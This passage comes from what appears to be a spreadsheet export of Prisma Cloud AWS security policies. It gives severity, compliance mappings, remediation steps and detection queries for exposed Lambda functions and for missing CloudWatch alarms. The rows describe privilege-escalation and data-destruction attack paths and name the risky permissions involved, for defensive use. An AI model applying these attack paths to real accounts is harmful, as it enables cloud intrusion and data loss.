'rds:CreateDBSecurityGroup', 'rds:DeleteDBSecurityGroup', 'rds:RevokeDBSecurityGroupIngress', 'ec2:AuthorizeSecurityGroupEgress', 'ec2:AuthorizeSecurityGroupIngress', 'ec2:CreateSecurityGroup', 'ec2:DeleteSecurityGroup', 'ec2:ModifySecurityGroupRules', 'ec2:RevokeSecurityGroupEgress', 'ec2:RevokeSecurityGroupIngress', 'elasticloadbalancing:ApplySecurityGroupsToLoadBalancer', 'elasticloadbalancing:SetSecurityGroups', 'redshift:AuthorizeClusterSecurityGroupIngress', 'redshift:CreateClusterSecurityGroup', 'redshift:DeleteClusterSecurityGroup'
Immediate attention is required to configure Lambda function authentication type to AWS_IAM and grant only the least privileges required and remove unwanted permissions assigned to the Lambda function. Restrict public exposure reported for the Lambda Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2013"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2013" t="inlineStr"/>
      <c r="Z2013" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Executable Lambda','AWS Lambda function URL AuthType set to NONE','AWS Lambda with write permissions on security group')</t>
        </is>
      </c>
      <c r="AA2013" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2013" t="inlineStr">
        <is>
          <t>2023-09-29 05:49:21</t>
        </is>
      </c>
      <c r="AC2013" t="inlineStr"/>
      <c r="AD2013" t="b">
        <v>1</v>
      </c>
      <c r="AE2013" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2013" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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3" t="inlineStr">
        <is>
          <t>8135a179-15b9-4a7c-b3a7-6d970909330e</t>
        </is>
      </c>
      <c r="AI2013" t="inlineStr">
        <is>
          <t>36b715e3-faa2-48fd-8892-b581d10594d9</t>
        </is>
      </c>
      <c r="AJ2013" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2013" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2014">
      <c r="A2014" t="inlineStr"/>
      <c r="B2014" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2014" s="2" t="inlineStr"/>
      <c r="D2014" t="inlineStr"/>
      <c r="E2014" t="inlineStr"/>
      <c r="F2014" t="inlineStr"/>
      <c r="G2014" t="b">
        <v>1</v>
      </c>
      <c r="H20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14" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2014" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K2014" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed unauthenticated AWS Lambda function with iam:PassRole and run EC2 instances permissions</t>
        </is>
      </c>
      <c r="L2014" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2014" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2014" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2014" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2014" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2014" t="inlineStr"/>
      <c r="R2014" t="inlineStr"/>
      <c r="S2014" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2014" t="b">
        <v>0</v>
      </c>
      <c r="U2014" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2014" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W2014" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions that are publicly exposed, URL AuthType set to NONE, , assigned with iam:PassRole, and have run EC2 instance permissions.
AuthType determines how Lambda authenticates or authorises requests to your function URL. When AuthType is set to NONE, Lambda doesn't perform any authentication before invoking your function. The lambda function, publicly accessible from the internet, could allow malicious actors to get initial access to the lambda function and run EC2 instances with any role would be able to escalate their permissions by attaching a privileged role to the instance.
This policy checks for the following permissions:
'iam:PassRole', 'ec2:RunInstances'.
Immediate attention is required to configure the Lambda function authentication type to AWS_IAM, grant only the least privileges required, and remove unwanted permissions assigned to the Lambda function. Restrict public exposure reported for the Lambda Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2014" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Lambda Function service
3. Find the resource-based policy of the AWS Lambda Function resource
4. Update the 'Principal' section of the policy to avoid public access
[PERMISSION]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the Lambda Function
3. Select the ‘Permissions' section under the 'Configuration’ tab
4. Navigate to the IAM Role by clicking on the Role name
5. Under 'Permissions policies', find the relevant policy according to the alert details and remove the risky actions
[MISCONFIGURATION]
1. Sign in to the AWS console
2. Select the region from the region drop-down for which the alert is generated
3. Navigate to the AWS Lambda Dashboard
4. Click on 'Functions' (Left panel)
5. Select the lambda function for which the alert is generated
6. Go to the 'Configuration' tab
7. Select 'Function URL'
8. Click on 'Edit'
9. Set 'Auth type' to 'AWS_IAM'
10. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2014" t="inlineStr"/>
      <c r="Z2014" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-lambda-list-functions' ) and finding.name contains all ('Publicly Executable Lambda','AWS Lambda function URL AuthType set to NONE','AWS Compute Instance (EC2/Lambda) Assigned Permissions to Run EC2 Instances Which Could Lead to Privilege Escalation')</t>
        </is>
      </c>
      <c r="AA2014" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2014" t="inlineStr">
        <is>
          <t>2024-06-21 07:13:04</t>
        </is>
      </c>
      <c r="AC2014" t="inlineStr"/>
      <c r="AD2014" t="b">
        <v>1</v>
      </c>
      <c r="AE2014" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2014" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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14" t="inlineStr">
        <is>
          <t>c24ec7eb-4ef4-4e11-bee9-5242bb756d0f</t>
        </is>
      </c>
      <c r="AI2014" t="inlineStr">
        <is>
          <t>173654e5-a9f8-4932-8623-3e58e3b56d9e</t>
        </is>
      </c>
      <c r="AJ2014" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2014" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2015">
      <c r="A2015" t="inlineStr"/>
      <c r="B2015" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2015" s="2" t="inlineStr"/>
      <c r="D2015" t="inlineStr"/>
      <c r="E2015" t="inlineStr"/>
      <c r="F2015" t="inlineStr"/>
      <c r="G2015" t="b">
        <v>1</v>
      </c>
      <c r="H20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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2015" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K2015" t="inlineStr">
        <is>
          <t>Data destruction risk due to a publicly exposed unauthenticated AWS Lambda function with unrestricted data destruction permissions</t>
        </is>
      </c>
      <c r="L2015" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2015" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2015" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2015" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2015" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2015" t="inlineStr"/>
      <c r="R2015" t="inlineStr"/>
      <c r="S2015" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2015" t="b">
        <v>0</v>
      </c>
      <c r="U2015" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2015" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W2015" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions that are publicly exposed through resource based policies with URL AuthType set to NONE and data destruction permissions.
AuthType determines how Lambda authenticates or authorises requests to your function URL. When AuthType is set to NONE, Lambda doesn't perform any authentication before invoking your function. Lambda function publicly accessible from the internet could allow malicious actors to get initial access to the lambda function and unauthenticated Lambda Function with access to delete cloud storage buckets, snapshots and images and destroy sensitive information stored in your cloud resources making irreversible damage to your organization. 
This policy checks for the following data destruction permissions: 
's3:DeleteBucket', 'rds:DeleteDBCluster', 'rds:DeleteDBInstance', 'rds:DeleteDBSnapshot', 'rds:DeleteDBClusterSnapshot', 'rds:DeleteGlobalCluster', 'ec2:DeleteSnapshot', 'ec2:DeleteVolume'
Immediate attention is required to configure Lambda function authentication type to AWS_IAM and grant only the least privileges required and remove unwanted permissions assigned to the Lambda function. Restrict public exposure reported for the Lambda Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2015" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Lambda Function service
3. Find resource-based policy of the AWS Lambda Function resource
4. Update the 'Principal' section of the policy to avoid public access
[MISCONFIGURATION]
1. Sign in to the AWS console
2. Select the region, from the region drop-down, for which the alert is generated
3. Navigate to AWS Lambda Dashboard
4. Click on the 'Functions' (Left panel)
5. Select the lambda function on which the alert is generated
6. Go to 'Configuration' tab
7. Select 'Function URL'
8. Click on 'Edit'
9. Set 'Auth type' to 'AWS_IAM'
10. Click on 'Save'
[PERMISSION]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2015" t="inlineStr"/>
      <c r="Z2015" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Executable Lambda','AWS Lambda function URL AuthType set to NONE','AWS Lambda Function with data destruction permissions')</t>
        </is>
      </c>
      <c r="AA2015" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2015" t="inlineStr">
        <is>
          <t>2023-08-21 06:18:32</t>
        </is>
      </c>
      <c r="AC2015" t="inlineStr"/>
      <c r="AD2015" t="b">
        <v>1</v>
      </c>
      <c r="AE2015" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2015" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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5" t="inlineStr">
        <is>
          <t>f205afda-aeb1-4a66-a16e-1302e888a55e</t>
        </is>
      </c>
      <c r="AI2015" t="inlineStr">
        <is>
          <t>78cf2f82-c2f0-49ad-b199-7cb50cfb4b3f</t>
        </is>
      </c>
      <c r="AJ2015" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2015" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2016">
      <c r="A2016" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, NYDFS 23 CRR-NY 500.0, Microsoft Cloud Security Benchmark v1, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, NYDFS 23 CRR-NY 500.0, NYDFS 23 CRR-NY 500.0, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2016" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2016" s="2" t="inlineStr"/>
      <c r="D2016" t="inlineStr"/>
      <c r="E2016" t="inlineStr"/>
      <c r="F2016" t="inlineStr"/>
      <c r="G2016" t="b">
        <v>1</v>
      </c>
      <c r="H20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16" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2016" t="inlineStr">
        <is>
          <t>aws-logs</t>
        </is>
      </c>
      <c r="K2016" t="inlineStr">
        <is>
          <t>AWS Log metric filter and alarm does  not exist for management console sign-in without MFA</t>
        </is>
      </c>
      <c r="L2016" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2016" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2016" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2016" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2016" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2016" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R2016" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S2016" t="inlineStr"/>
      <c r="T2016" t="b">
        <v>0</v>
      </c>
      <c r="U2016" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2016" t="inlineStr">
        <is>
          <t>aws-logs-describe-metric-filters</t>
        </is>
      </c>
      <c r="W2016" t="inlineStr">
        <is>
          <t>This policy identifies the AWS regions that do not have a log metric filter and alarm for management console sign-in without MFA.
A log metric filter in AWS CloudWatch scans log data for specific patterns and generates metrics based on those patterns. Unauthorized access attempts may go undetected without a log metric filter and alarm for console sign-ins without MFA. This increases the risk of account compromise and potential data breaches due to inadequate security monitoring.
It is recommended that a metric filter and alarm be established for management console sign-in without MFA to increase visibility into accounts that are not protected by MFA.
NOTE: This policy will trigger an alert if you have at least one Cloudtrail with the multi-trail is enabled, Logs all management events in your account, and is not set with a specific log metric filter and alarm.</t>
        </is>
      </c>
      <c r="X2016" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS Console.
2. Navigate to the CloudWatch dashboard.
3. Click on 'Log groups' in the 'Logs' section (Left panel)
4. Select the log group created for your CloudTrail trail event logs (Cloudtrail should be multi-trail enabled with all Management Events captured) and click the Actions Dropdown Button -&gt; Click 'Create Metric Filter' button.
5. In the 'Define Pattern' page, add the 'Filter pattern' value as
{ ($.eventName = "ConsoleLogin") &amp;&amp; ($.additionalEventData.MFAUsed != "Yes") &amp;&amp; ($.userIdentity.type = "IAMUser") &amp;&amp; ($.responseElements.ConsoleLogin = "Success") }
and Click on 'NEXT'.
6. In the 'Assign Metric' page, Choose Filter Name, and Metric Details parameter according to your requirement and click on 'Next'.
7. Under the ‘Review and Create' page, Review details and click 'Create Metric Filter’.
8. To create an alarm based on a log group-metric filter, Refer to the below link 
    https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/Create_alarm_log_group_metric_filter.html</t>
        </is>
      </c>
      <c r="Y2016" t="inlineStr"/>
      <c r="Z2016"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"ConsoleLogin" and ($.X.filterPattern contains "MFAUsed !=" or $.X.filterPattern contains "MFAUsed!=") and $.X.filterPattern contains "Yes" and ($.X.filterPattern contains "userIdentity.type =" or $.X.filterPattern contains "userIdentity.type=") and $.X.filterPattern contains "IAMUser" and ($.X.filterPattern contains "responseElements.ConsoleLogin =" or $.X.filterPattern contains "responseElements.ConsoleLogin=") and $.X.filterPattern contains "Success") and ($.X.metricTransformations[*] contains $.Y.metricName))'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2016" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2016" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2016" t="inlineStr">
        <is>
          <t>PC-AWS-CWT-1215</t>
        </is>
      </c>
      <c r="AD2016" t="b">
        <v>1</v>
      </c>
      <c r="AE2016" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2016" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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16" t="inlineStr">
        <is>
          <t>1ac46dba-372d-454c-ad22-47393f9123b4</t>
        </is>
      </c>
      <c r="AI2016" t="inlineStr">
        <is>
          <t>5cd40820-647d-4a7c-92de-215bc68da907</t>
        </is>
      </c>
      <c r="AJ2016" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2016" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2017">
      <c r="A2017" t="inlineStr">
        <is>
          <t>jneytchev-fedramp-low, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, CIS v1.3.0 (AWS), ISO/IEC 27017:2015, MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, kfirdaus AWS Account-CS, MLPS 2.0 (Level 2),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CIS v1.5.0 (AWS) - Level 1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CSA CCM v4.0.12, TX-RAMP Level 2, APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, CIS v3.0.0 (AWS) Level 2, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, HITRUST CSF v.9.6.0, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), CIS v2.0.0 (AWS) - Level 2, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, HIPAA, ITSG-33, NIST 800-53 Rev 5, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, PCI DSS v4.0, TX-RAMP Level 1, NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CDC NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27017:2015, TX-RAMP Level 2, CIS v1.4.0 (AWS), CIS Controls v8,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TX-RAMP Level 2, ISO/IEC 27002:2013, Fedramp (Low), NIST SP 800-171 Revision 3, ISO/IEC 27017:2015, Fedramp (Low), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST CSF, NYDFS 23 CRR-NY 500.0, MTSBv2_AWS,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ITSG-33, ISO/IEC 27002:2013, PCI DSS v4.0, CSA CCM v.4.0.1, wells fargo CIS v1.5.0 (AWS) - Level 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CIS v1.2.0 (AWS), NIST SP 800-172, CSA CCM v.4.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2017" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2017" s="2" t="inlineStr"/>
      <c r="D2017" t="inlineStr"/>
      <c r="E2017" t="inlineStr"/>
      <c r="F2017" t="inlineStr"/>
      <c r="G2017" t="b">
        <v>1</v>
      </c>
      <c r="H20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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2017" t="inlineStr">
        <is>
          <t>aws-logs</t>
        </is>
      </c>
      <c r="K2017" t="inlineStr">
        <is>
          <t>AWS Log metric filter and alarm does not exist for unauthorized API calls</t>
        </is>
      </c>
      <c r="L2017" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2017" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2017" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2017" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2017" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2017" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2017" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2017" t="inlineStr"/>
      <c r="T2017" t="b">
        <v>0</v>
      </c>
      <c r="U2017" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2017" t="inlineStr">
        <is>
          <t>aws-logs-describe-metric-filters</t>
        </is>
      </c>
      <c r="W2017" t="inlineStr">
        <is>
          <t>This policy identifies the AWS regions which do not have a log metric filter and alarm for unauthorized API calls. Monitoring unauthorized API calls will help reveal application errors and may reduce the time to detect malicious activity. It is recommended that a metric filter and alarm be established for unauthorized API calls.
NOTE: This policy will trigger alert if you have at least one Cloudtrail with the multi trial is enabled, Logs all management events in your account and is not set with specific log metric filter and alarm.</t>
        </is>
      </c>
      <c r="X2017"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($.errorCode = "*UnauthorizedOperation") || ($.errorCode = "AccessDenied*")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17" t="inlineStr"/>
      <c r="Z2017"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"errorCode=" or $.X.filterPattern contains "errorCode =") and ($.X.filterPattern does not contain "errorCode!=" and $.X.filterPattern does not contain "errorCode !=") and $.X.filterPattern contains "UnauthorizedOperation" and $.X.filterPattern contains "AccessDenied") and ($.X.metricTransformations[*] contains $.Y.metricName))'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2017" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2017" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2017" t="inlineStr">
        <is>
          <t>PC-AWS-CWT-503</t>
        </is>
      </c>
      <c r="AD2017" t="b">
        <v>1</v>
      </c>
      <c r="AE2017" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2017" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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7" t="inlineStr">
        <is>
          <t>9603b1b9-89a7-406a-8e7a-7bd870145136</t>
        </is>
      </c>
      <c r="AI2017" t="inlineStr">
        <is>
          <t>366ccd61-7595-44d8-b079-0a2cd09390e8</t>
        </is>
      </c>
      <c r="AJ2017" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2017" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2018">
      <c r="A2018" t="inlineStr">
        <is>
          <t>Telecommunications Security Act - TSA, Microsoft Cloud Security Benchmark v1, NIST SP 800-171 Revision 3, NYDFS 23 CRR-NY 500.0, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2024.2, CIS v2.0.0 (AWS) - Level 1, SOC 2, CRI Profile v2.0, Secure Controls Framework (SCF) - 2024.2, CIS v3.0.0 (AWS) Level 1, NIST CSF v2.0, HIPAA, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, Telecommunications Security Act - TSA, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B2018" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C2018" s="2" t="inlineStr"/>
      <c r="D2018" t="n">
        <v>0</v>
      </c>
      <c r="E2018" t="n">
        <v>0</v>
      </c>
      <c r="F2018" t="n">
        <v>56</v>
      </c>
      <c r="G2018" t="b">
        <v>1</v>
      </c>
      <c r="H20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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2018" t="inlineStr">
        <is>
          <t>aws-logs</t>
        </is>
      </c>
      <c r="K2018" t="inlineStr">
        <is>
          <t>AWS Log metric filter and alarm does not exist for AWS Organization changes</t>
        </is>
      </c>
      <c r="L2018" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2018" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2018" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2018" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2018" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2018" t="inlineStr">
        <is>
          <t>Organisational Controls</t>
        </is>
      </c>
      <c r="R2018" t="inlineStr">
        <is>
          <t>A5.25</t>
        </is>
      </c>
      <c r="S2018" t="inlineStr"/>
      <c r="T2018" t="b">
        <v>0</v>
      </c>
      <c r="U2018" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2018" t="inlineStr">
        <is>
          <t>aws-logs-describe-metric-filters</t>
        </is>
      </c>
      <c r="W2018" t="inlineStr">
        <is>
          <t>This policy identifies the AWS regions that do not have a log metric filter and alarm for AWS Organizations changes. Monitoring changes to AWS Organizations will help to ensure any unwanted, accidental, or intentional modifications that may lead to unauthorized access or other security breaches within the AWS account. It is recommended that a metric filter and alarm be established for detecting changes to AWS Organization's configurations.
NOTE: This policy will trigger an alert if you have at least one Cloudtrail with the multi trial enabled, Logs all management events in your account, and is not set with a specific log metric filter and alarm.</t>
        </is>
      </c>
      <c r="X2018" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS Console.
2. Navigate to the CloudWatch dashboard.
3. Click on 'Log groups' in the 'Logs' section (Left panel)
4. Select the log group created for your CloudTrail trail event logs (Cloudtrail should be multi-trail enabled with all Management Events captured) and click the Actions Dropdown Button -&gt; Click 'Create Metric Filter' button.
5. In the 'Define Pattern' page, add the 'Filter pattern' value as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and Click on 'NEXT'.
6. In the 'Assign Metric' page, Choose Filter Name, and Metric Details parameter according to your requirement and click on 'Next'.
7. Under the ‘Review and Create' page, Review details and click 'Create Metric Filter’.
8. To create an alarm based on a log group-metric filter, Refer to the below link 
    https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/Create_alarm_log_group_metric_filter.html</t>
        </is>
      </c>
      <c r="Y2018" t="inlineStr"/>
      <c r="Z2018"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"eventSource=" or $.X.filterPattern contains "eventSource =") and ($.X.filterPattern does not contain "eventSource!=" and $.X.filterPattern does not contain "eventSource !=") and $.X.filterPattern contains organizations.amazonaws.com and $.X.filterPattern contains AcceptHandshake and $.X.filterPattern contains AttachPolicy and $.X.filterPattern contains CreateAccount and $.X.filterPattern contains CreateOrganizationalUnit and $.X.filterPattern contains CreatePolicy and $.X.filterPattern contains DeclineHandshake and $.X.filterPattern contains DeleteOrganization and $.X.filterPattern contains DeleteOrganizationalUnit and $.X.filterPattern contains DeletePolicy and $.X.filterPattern contains DetachPolicy and $.X.filterPattern contains DisablePolicyType and $.X.filterPattern contains EnablePolicyType and $.X.filterPattern contains InviteAccountToOrganization and $.X.filterPattern contains LeaveOrganization and $.X.filterPattern contains MoveAccount and $.X.filterPattern contains RemoveAccountFromOrganization and $.X.filterPattern contains UpdatePolicy and $.X.filterPattern contains UpdateOrganizationalUnit) and ($.X.metricTransformations[*] contains $.Y.metricName))'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2018" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2018" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2018" t="inlineStr">
        <is>
          <t>PC-AWS-CWT-1092</t>
        </is>
      </c>
      <c r="AD2018" t="b">
        <v>1</v>
      </c>
      <c r="AE2018" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2018" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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8" t="inlineStr">
        <is>
          <t>b131942a-b497-4b67-a98b-cd508284d1b5</t>
        </is>
      </c>
      <c r="AI2018" t="inlineStr">
        <is>
          <t>54d3d1c2-bd0d-4347-a933-df3b29abf300</t>
        </is>
      </c>
      <c r="AJ2018" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2018" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2019">
